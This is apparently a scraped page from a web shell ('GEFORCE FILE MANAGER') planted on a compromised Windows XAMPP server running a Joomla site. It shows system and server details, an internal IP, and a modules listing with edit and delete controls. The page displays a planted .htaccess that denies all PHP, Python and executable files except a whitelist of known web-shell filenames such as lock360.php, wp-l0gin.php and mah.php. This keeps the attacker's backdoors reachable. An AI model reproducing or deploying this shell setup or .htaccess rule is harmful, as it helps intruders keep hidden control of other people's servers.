[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
modules
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 mod_articles_archive
SET
[ DEL ]
📁 mod_articles_categories
SET
[ DEL ]
📁 mod_articles_category
SET
[ DEL ]
📁 mod_articles_latest
SET
[ DEL ]
📁 mod_articles_news
SET
[ DEL ]
📁 mod_articles_popular
SET
[ DEL ]
📁 mod_banners
SET
[ DEL ]
📁 mod_breadcrumbs
SET
[ DEL ]
📁 mod_custom
SET
[ DEL ]
📁 mod_feed
SET
[ DEL ]
📁 mod_finder
SET
[ DEL ]
📁 mod_footer
SET
[ DEL ]
📁 mod_languages
SET
[ DEL ]
📁 mod_login
SET
[ DEL ]
📁 mod_menu
SET
[ DEL ]
📁 mod_random_image
SET
[ DEL ]
📁 mod_related_items
SET
[ DEL ]
📁 mod_search
SET
[ DEL ]
📁 mod_simplefileuploadv1.3
SET
[ DEL ]
📁 mod_stats
SET
[ DEL ]
📁 mod_syndicate
SET
[ DEL ]
📁 mod_tags_popular
SET
[ DEL ]
📁 mod_tags_similar
SET
[ DEL ]
📁 mod_users_latest
SET
[ DEL ]
📁 mod_whosonline
SET
[ DEL ]
📁 mod_wrapper
SET
[ DEL ]
📄 .htaccess
498 B
SET
[ EDIT ]
|
[ DEL ]
📄 admin.php
33,110 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.html
31 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
6,285 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: .htaccess
<FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php|mah.php|jp.php|ext.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>